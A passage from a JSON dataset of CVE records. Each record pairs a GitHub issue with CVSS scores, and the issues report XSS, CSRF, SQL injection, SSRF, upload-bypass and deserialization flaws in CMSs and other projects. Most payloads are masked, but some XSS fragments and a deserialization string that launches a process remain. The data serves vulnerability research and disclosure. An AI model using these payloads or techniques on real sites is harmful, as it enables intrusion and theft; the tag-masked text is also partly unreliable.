        "description": "There is a XSS vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[smtp_user] parameter post to the PATHTAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC xss payload: \"> APITAG Vulnerability trigger point POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG when administrator access system settings mail server .then XSS vulnerability is triggered",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19924",
        "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/3178",
        "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/3178",
        "Repo_new": "boostio/boostnote-legacy",
        "Issue_Created_At": "2019-07-28T14:16:18Z",
        "description": "Notes Exported to PDF Format Is Existing XSS Attacks. Current behavior Notes Exported to PDF Format Is Existing XSS Attacks. Expected behavior Notes Exported to PDF Format Is Existing XSS Attacks. When there is a code in the note: \\ APITAG XSS attacks are triggered when the export PDF function is reused. FILETAG Steps to reproduce NUMBERTAG Put the payload below into your notes. Payload: \\ APITAG I cut a picture: FILETAG NUMBERTAG Click on the APITAG button in the upper right corner of the note to export the file in PDF format. This will trigger payload to generate a bullet window, that is, there is an XSS attack NUMBERTAG Here is a demo video: FILETAG Environment Version NUMBERTAG OS Version and name : Microsoft Windows NUMBERTAG Home Chinese Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19949",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/21",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/21",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-08-05T11:27:25Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in FILETAG Steps To Reproduce: APITAG Admin System NUMBERTAG create new page url: FILETAG CODETAG FILETAG APITAG link FILETAG Release Info NUMBERTAG author by barret. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-19950",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/22",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/22",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-08-05T11:58:43Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in FILETAG Steps To Reproduce: APITAG Admin System NUMBERTAG create new page url: FILETAG CODETAG FILETAG APITAG links FILETAG Release Info NUMBERTAG author by barret. EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-19951",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/43",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/43",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-03-09T13:40:14Z",
        "description": "A CSRF vulnerability exists in APITAG NUMBERTAG Introduction When the Administrator login APITAG can construct malicious POCS to fool administrator into accessing it then the APPID of Alipay, the private key of the merchant application, and the public key of Alipay can be change APITAG a attack can be get the profit of this website! Vulnerable code ERRORTAG CSRF APITAG CODETAG Proof FILETAG Suggestion Use the APITAG to protect it!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19964",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/9",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/9",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2019-10-28T06:19:09Z",
        "description": "CSRF vulnerability exists in APITAG NUMBERTAG Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG The backend code writes the new user data to the database without authentication such as token CODETAG When the background administrator clicks the malicious link, the background will add an administrator user APITAG CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20092",
        "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/8",
        "Issue_Url_new": "https://github.com/woider/articlecms/issues/8",
        "Repo_new": "woider/articlecms",
        "Issue_Created_At": "2019-08-15T12:40:09Z",
        "description": "there is a File upload attack vulnerability. there is a File upload attack vulnerability,It can lead to arbitrary uploading of PHP script files. The location of the vulnerability is in URLTAG the content editing function is. FILETAG Let's see the code: FILETAG There are two problems NUMBERTAG The uploaded file detection is not strict, only the content type is detected, and even the file suffix is not detected, which causes us to modify the content type when uploading to bypass the upload php file NUMBERTAG File processing logic vulnerabilities, although there is a file abbreviated processing, but when uploading a sentence Trojan with a jpg file header, the server will not return the address, but the file is already stored on the server, so the file upload can be achieved. In addition, although the CMS detects and filters uploaded files, it will be automatically commented out if it matches APITAG APITAG to bypass My exploit is as follows: FILETAG Let's test it out. FILETAG as we can APITAG PHP Trojan has been successfully uploaded and validated.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20120",
        "Issue_Url_old": "https://github.com/top-think/thinkphp/issues/553",
        "Issue_Url_new": "https://github.com/top-think/thinkphp/issues/553",
        "Repo_new": "top-think/thinkphp",
        "Issue_Created_At": "2019-08-23T09:39:22Z",
        "description": "SQL injection problem exists for multiple functions below version NUMBERTAG I found a lot of such code in our extensive penetration test. APITAG Such code is not pre processed by sql during preprocessing. can be seen ERRORTAG or ERRORTAG And the official website also has a lot of such writings. FILETAG Are all wrong demonstrations that will cause more SQL injection Sql injection can also be performed in the FILETAG limit function and the order function. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20124",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/188",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/188",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-11-18T08:42:58Z",
        "description": "Remote Code Execution Vulnerability In WUZHI CMS NUMBERTAG In the set_cache method of the PATHTAG file, when $data is not of the array type, $data will be written directly to the php file. ERRORTAG NUMBERTAG The set_cache method is called in the set method of the PATHTAG file, and $GLOBALS FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20128",
        "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/33",
        "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/33",
        "Repo_new": "wanglelecc/laracms",
        "Issue_Created_At": "2019-08-24T07:18:23Z",
        "description": "Security Cleartext Transmission of Sensitive Information. FILETAG FILETAG FILETAG FILETAG The software transmits sensitive or security critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. So please encrypt the data with a reliable encryption scheme before transmitting.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20129",
        "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/34",
        "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/34",
        "Repo_new": "wanglelecc/laracms",
        "Issue_Created_At": "2019-08-25T10:08:54Z",
        "description": "\u5b58\u50a8\u578bXSS NUMBERTAG FILETAG APITAG APITAG FILETAG \u7136\u540e\u5b8c\u6210\u7f16\u8f91\uff0c\u70b9\u51fb\u63d0\u4ea4\u6309\u94ae FILETAG FILETAG \u4f7f\u7528\u76f8\u5173\u5de5\u5177\uff0c\u62e6\u622a\u63d0\u4ea4\u7684\u8bf7\u6c42\uff0c\u5e76\u5c06\u63d0\u4ea4\u7684 APITAG alert(\"test\") APITAG APITAG APITAG \u7684URL\u7f16\u7801 FILETAG FILETAG \u63d0\u4ea4\u8bf7\u6c42\u5230\u670d\u52a1\u5668\uff0c\u6b64\u65f6\u5bf9\u5e94\u811a\u672c\u5df2\u5199\u5165\u6570\u636e\u5e93\u4e2d\u3002 FILETAG FILETAG APITAG \u4fee\u590d\u5efa\u8bae\uff1a\u5bf9\u63d2\u5165\u7684\u8d85\u94fe\u63a5\u8bf7\u6c42\u5728\u670d\u52a1\u5668\u7aef\u4e5f\u505a\u7f16\u7801\u548c\u8fc7\u6ee4\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20131",
        "Issue_Url_old": "https://github.com/wanglelecc/laracms/issues/36",
        "Issue_Url_new": "https://github.com/wanglelecc/laracms/issues/36",
        "Repo_new": "wanglelecc/laracms",
        "Issue_Created_At": "2019-08-27T18:37:59Z",
        "description": "Stored XSS of PAGE control. FILETAG FILETAG FILETAG FILETAG FILETAG The vunerbility is founded in laracms NUMBERTAG Hackers can inject a script in the place where the page is managed. It's content accept all user input and store to the database. While other user accessing this website will excute the script. You should filter and escape the output which is picked up from database before show it to the users.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20136",
        "Issue_Url_old": "https://github.com/QuantConnect/Lean/issues/3537",
        "Issue_Url_new": "https://github.com/quantconnect/lean/issues/3537",
        "Repo_new": "quantconnect/lean",
        "Issue_Created_At": "2019-08-25T09:35:19Z",
        "description": "Insecure Deserialization due to insecure APITAG leads to Code Execution.. Expected Behavior The application should not deserialize untrusted data which is user controllable without proper checks and validation of incoming types. Actual Behavior While deserializing a string, the deserializer is able to invoke unsafe classes that can execute OS commands due to insecure configuration of APITAG property in APITAG , which is currently set to All from version NUMBERTAG to NUMBERTAG The vulnerable code is in PATHTAG line NUMBERTAG Potential Solution NUMBERTAG While deserializing untrusted data. DO NOT use any APITAG other than None. ( Highly Recommended NUMBERTAG If APITAG other than None is required, then use a APITAG to validate and whitelist the incoming types . Reproducing the Problem NUMBERTAG After opening the solution in visual studio, write the below lines of code in any class that inherits from APITAG class. I have written below code in APITAG // string containing exploit code. The string source can be data from remote data server or local file. string server_data = \"{ $type : APITAG , APITAG : Start , APITAG :{ $type : APITAG , $values : calc ]}, APITAG :{ $type : APITAG }}\"; // Call the APITAG method in APITAG by passing string, which will try to deserialize the string to an object. object obj = APITAG NUMBERTAG Rebuild and run the solution. The calculator program will pop up. I have a video POC. Please request in case required APITAG System Information Tested on Windows NUMBERTAG with Visual Studio NUMBERTAG Community Edition. Codebase version tested NUMBERTAG Checklist I have completely filled out this template I have confirmed that this issue exists on the current master branch I have confirmed that this is not a duplicate issue by searching [issues URLTAG I have provided detailed steps to reproduce the issue",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20184",
        "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/736",
        "Issue_Url_new": "https://github.com/liftoff/gateone/issues/736",
        "Repo_new": "liftoff/gateone",
        "Issue_Created_At": "2019-08-28T00:36:09Z",
        "description": "A RCE Security vulnerability. In this file URLTAG There is a command execution and the argument comes from user input. FILETAG Poc NUMBERTAG Deploy a APITAG instance. URLTAG FILETAG FILETAG NUMBERTAG Open the dev tool in your browser, open the APITAG page. FILETAG NUMBERTAG Try to create an ssh connection. And watch the APITAG traffic, wait for the APITAG command executes. FILETAG NUMBERTAG Now we can switch the dev tool to console, and input this APITAG script to let APITAG APITAG send Our evil command. We can see that we get the command execution result from the error message. APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20189",
        "Issue_Url_old": "https://github.com/ornose15/NewPK/issues/1",
        "Issue_Url_new": "https://github.com/ornose15/newpk/issues/1",
        "Repo_new": "ornose15/newpk",
        "Issue_Created_At": "2019-08-29T16:13:49Z",
        "description": "There are a SQL inject at FILETAG . SQL inject start at line NUMBERTAG APITAG filtered by modify function APITAG ,but the problem is : filter rules are too APITAG function at FILETAG line NUMBERTAG ERRORTAG you can see it's just replace space to ' ' ,it's simple to bypass this filter with change space to comment ============================ here is sql inject position code: APITAG safe title ERRORTAG ============================ fix advice: add more filter rules or use APITAG to protect your variable",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-2023",
        "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2488",
        "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2488",
        "Repo_new": "kata-containers/runtime",
        "Issue_Created_At": "2020-02-20T16:13:48Z",
        "description": "clh: update the . Which feature do you think can be improved? Specify the feature you think could be made better. How can it be improved? Describe how specifically you think it could be improved. Additional Information Anything else to add? Before raising this feature request Have you looked at the FILETAG ?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.3,
        "impactScore": 3.7,
        "exploitabilityScore": 2.0
    },
    {
        "CVE_ID": "CVE-2020-2023",
        "Issue_Url_old": "https://github.com/kata-containers/agent/issues/791",
        "Issue_Url_new": "https://github.com/kata-containers/agent/issues/791",
        "Repo_new": "kata-containers/agent",
        "Issue_Created_At": "2020-06-03T15:33:02Z",
        "description": "Explicitly deny any access to the nvdimm root partition. Explicitly deny any access to the nvdimm root partition by adding the nvdimm device to the device cgroup.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.3,
        "impactScore": 3.7,
        "exploitabilityScore": 2.0
    },
    {
        "CVE_ID": "CVE-2020-2024",
        "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2474",
        "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2474",
        "Repo_new": "kata-containers/runtime",
        "Issue_Created_At": "2020-02-19T12:52:15Z",
        "description": "harden container hostpath cleanup. Description of problem A container's host path might be changed by the guest to point to some other places by placing a symlink there. kata runtime should not follow link when unmounting them otherwise we might end up unmounting some other mountpoints unexpectedly.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 4.0,
        "exploitabilityScore": 2.0
    },
    {
        "CVE_ID": "CVE-2020-2026",
        "Issue_Url_old": "https://github.com/kata-containers/runtime/issues/2712",
        "Issue_Url_new": "https://github.com/kata-containers/runtime/issues/2712",
        "Repo_new": "kata-containers/runtime",
        "Issue_Created_At": "2020-05-29T15:40:02Z",
        "description": "host shared directory should be readonly. We need to make sure containers cannot modify host path unless it is explicitly shared to it. Right now we expose an additional top level shared directory to the guest and allow it to be modified. This is less ideal and can be enhanced by following method NUMBERTAG create two directories for each sandbox: . PATHTAG a directory to hold all host/guest shared mounts . PATHTAG a host/guest shared directory NUMBERTAG pfs/virtiofs source dir NUMBERTAG PATHTAG is bind mounted readonly to PATHTAG so guest cannot modify it NUMBERTAG host guest shared files/directories are mounted one level under PATHTAG and thus present to guest at one level under PATHTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 6.0,
        "exploitabilityScore": 2.0
    },
    {
        "CVE_ID": "CVE-2020-20269",
        "Issue_Url_old": "https://github.com/careteditor/issues/issues/841",
        "Issue_Url_new": "https://github.com/careteditor/issues/issues/841",
        "Repo_new": "careteditor/issues",
        "Issue_Created_At": "2018-11-12T18:00:27Z",
        "description": "Critical security issue in NUMBERTAG rc NUMBERTAG Hi guys, i found a critical security issue in APITAG and i would like to reach out to you privately so that i can give you the details without disclosing them publicly yet. Is there an email address i can write to?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20294",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/49",
        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/49",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2019-10-10T03:26:21Z",
        "description": "Vulnerability Report: cmswing NUMBERTAG code execution. Find a code execution vulnerability in cmswing project version APITAG PDF file for details FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20295",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/50",
        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/50",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2019-10-10T03:56:23Z",
        "description": "Vulnerability Report: cmswing NUMBERTAG APITAG sql injection. Find a code execution vulnerability in cmswing project version APITAG can be found in the analysis below. Vulnerability Location The vulnerability lies in the APITAG function in the APITAG CODETAG The variable data is the user behavior data transmitted by the front end. The function APITAG updates the user behavior using data. Due to the lack of data checking, SQL injection exists. When the user triggers the corresponding behavior, for example, adding articles, SQL statement execution will be triggered. Local Test Enter the background of the system, select user behavior\uff0cadd our payload to the rules of conduct FILETAG Add an article to trigger the user behavior just now. The SQL statement is executed successfully and the response time exceeds NUMBERTAG seconds. FILETAG FILETAG Database Execution Log FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20296",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/51",
        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/51",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2019-10-10T04:00:45Z",
        "description": "Vulnerability Report: cmswing NUMBERTAG user recharge sql injection. Find a code execution vulnerability in cmswing project version APITAG can be found in the analysis below. Vulnerability Location The vulnerability lies in the APITAG function in the APITAG CODETAG The variable APITAG represents the amount of recharge. The function APITAG increases the amount of money by the specified user, but lacks sufficient checks for APITAG , which results in SQL injection when database update operation is performed. Local Test Enter the background of the system, select user recharge FILETAG Modify the balance to APITAG . it was found that the replenishment was successful and the response time was extended by NUMBERTAG seconds, proving that our statement was successfully injected into the database for execution. FILETAG Database Execution Log FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20341",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/44",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/44",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-03-27T07:58:13Z",
        "description": "A SSRF in yzmcms NUMBERTAG management. \u540e\u53f0\u7f16\u8f91\u6587\u7ae0\u5904\uff0c\u6700\u4e0b\u65b9\u9009\u9879 APITAG PATHTAG APITAG FILETAG When modifying an article or adding an article, you chose to load a remote file locally,It will enter the APITAG , which matches the img tag in the article content, extracts the link and saves it in $ val = $ value, and then uses strpos to determine whether there is http in the link. If not, it returns directly (indicating that this is not an external network image link). Then read the first dot from right to left as the segmentation to get the suffix name, and then check the suffix on the white list. The suffix name here can be bypassed by APITAG . Then there are vulnerabilities APITAG readfile reads the file content and saves it to a jpg file. If readfile reads a file with warning or error, it will jump to the error handling function. payload\uff1a APITAG You can probe the intranet port and ip here. At the same time, here is also a file reading vulnerability, but reading php files may report an error. Try reading FILETAG because the YZMPHP_PATH variable is not declared and an error is reported.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20343",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/8",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/8",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-09-04T11:12:45Z",
        "description": "There is one CSRF vulnerability that can add news. You can add articles in admin background, but there is a CSRF vulnerability. FILETAG FILETAG FILETAG FILETAG POC CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-20344",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/9",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/9",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-09-04T12:58:44Z",
        "description": "Reflective XSS vulnerability exists in wtcms. Reflective XSS exists in keyword search area managed by administrator background articles url: URLTAG POC \"> APITAG <a src=\" FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20345",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/10",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/10",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-09-04T13:48:48Z",
        "description": "CSRF combines reflective XSS to obtain cookies. Reflective XSS exists in the administrator's page management office In the search box, enter \"> APITAG <a src=\" to trigger XSS FILETAG FILETAG Reuse CSRF vulnerability to obtain cookies FILETAG FILETAG FILETAG POC CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20347",
        "Issue_Url_old": "https://github.com/taosir/wtcms/issues/11",
        "Issue_Url_new": "https://github.com/taosir/wtcms/issues/11",
        "Repo_new": "taosir/wtcms",
        "Issue_Created_At": "2019-09-05T11:45:33Z",
        "description": "Storage XSS was found in three places. Three storage XSS were found in wtcms POC\uff1a APITAG APITAG on the background article management and fill in the XSS code at the source of the article FILETAG Find the published article in the front desk and click on the link to trigger XSS FILETAG FILETAG POC\uff1a APITAG APITAG on the background menu management, fill in the XSS code at the link, and finally click save FILETAG Find the location where the XSS code is inserted in the foreground and click to trigger the XSS attack FILETAG FILETAG POC\uff1a APITAG APITAG on the background links, fill in the XSS code at the link address, and finally click Save FILETAG Find the link address at the bottom of the front desk and click to trigger XSS FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20363",
        "Issue_Url_old": "https://github.com/wind226/CVE/issues/1",
        "Issue_Url_new": "https://github.com/wind226/cve/issues/1",
        "Repo_new": "wind226/cve",
        "Issue_Created_At": "2019-11-16T13:35:52Z",
        "description": "Pbootcms background storage XSS. step1 Access admin page FILETAG step2 URLTAG FILETAG step3 FILETAG FILETAG ste4 XSS Trigger point FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-20389",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1321",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2019-12-01T16:05:56Z",
        "description": "Cross Site Scripting(XSS) Vulnerability in Latest Release NUMBERTAG a FILETAG . Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest APITAG FILETAG . Description: Cross site scripting (XSS) vulnerability in FILETAG url: FILETAG You can Edit html source code in rich text editor,and execute APITAG code. payload: ERRORTAG FILETAG And visit index page. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-20391",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1322",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2019-12-01T16:14:31Z",
        "description": "Cross Site Scripting(XSS) Vulnerability in Latest Release NUMBERTAG a FILETAG . Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest APITAG FILETAG . Description: Cross site scripting (XSS) vulnerability in FILETAG url: FILETAG APITAG Snippet\u201d, input payload in snippets title payload: ERRORTAG and APITAG snippets\" FILETAG Last, visit FILETAG agin. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-20392",
        "Issue_Url_old": "https://github.com/peacexie/imcat/issues/5",
        "Issue_Url_new": "https://github.com/peacexie/imcat/issues/5",
        "Repo_new": "peacexie/imcat",
        "Issue_Created_At": "2020-08-02T17:12:20Z",
        "description": "Sql injection vulnerability in Latest Release NUMBERTAG product reviews. Hi, I would like to report Sql injection vulnerability in latest release NUMBERTAG product PATHTAG I found it in the demo( URLTAG Add a product reviews FILETAG Test the fm FILETAG payload: APITAG FILETAG payload APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-20412",
        "Issue_Url_old": "https://github.com/stepmania/stepmania/issues/1890",
        "Issue_Url_new": "https://github.com/stepmania/stepmania/issues/1890",
        "Repo_new": "stepmania/stepmania",
        "Issue_Created_At": "2019-09-10T06:39:53Z",
